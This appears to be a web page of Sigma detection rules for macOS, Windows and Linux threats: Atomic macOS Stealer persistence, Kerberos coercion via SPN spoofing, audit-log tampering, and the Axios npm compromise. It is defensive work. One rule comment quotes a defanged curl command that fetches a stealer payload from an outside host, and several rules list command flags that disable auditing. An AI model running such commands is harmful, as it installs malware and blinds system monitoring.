    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
    - https://moonlock.com/amos-backdoor-persistent-access
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1564.001
    - attack.t1543.004
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_user_helper:
        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
        Image|endswith: '/curl'
        TargetFilename|startswith: '/Users/'
        TargetFilename|endswith: '.helper'
    selection_launchdaemon:
        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

high
Moderate
High FP
Attempts of Kerberos Coercion Via DNS SPN Spoofing
Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or checking for the presence of such records through the `nslookup` command.

title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
id: 0ed99dda-6a35-11ef-8c99-0242ac120002
related:
    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2
      type: similar
status: experimental
description: |
    Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
    The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
    to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
    If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
    or checking for the presence of such records through the `nslookup` command.
references:
    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
    - attack.collection
    - attack.credential-access
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1557.001
    - attack.t1187
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'UWhRCA'
            - 'BAAAA'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Moderate
High FP
Audit Policy Tampering Via NT Resource Kit Auditpol
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
view Sigma YAML
title: Audit Policy Tampering Via NT Resource Kit Auditpol
id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e
related:
- id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version
type: similar
status: test
description: |
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
- https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-18
modified: 2023-02-21
tags:
- attack.defense-impairment
- attack.t1685.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '/logon:none'
- '/system:none'
- '/sam:none'
- '/privilege:none'
- '/object:none'
- '/process:none'
- '/policy:none'
condition: selection
falsepositives:
- The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
level: high
high
Moderate
Medium FP
Audit Rules Deleted Via Auditctl
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
view Sigma YAML
title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
- https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
- https://linux.die.net/man/8/auditct
author: Mohamed LAKRI
date: 2025-10-17
tags:
- attack.defense-impairment
- attack.t1685.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/auditctl'
CommandLine|re: '-D'
condition: selection
falsepositives:
- An administrator troubleshooting. Investigate all attempts.
level: high
high
Moderate
Medium FP
Axios NPM Compromise File Creation Indicators - Linux
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
view Sigma YAML
title: Axios NPM Compromise File Creation Indicators - Linux
id: b7cb840c-11f6-47f7-b3ef-5524739c9077
status: experimental
description: |
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: file_event
product: linux
detection:
selection:
Image|endswith: '/curl'
TargetFilename: '/tmp/ld.py'
condition: selection
falsepositives:
- Highly unlikely
level: high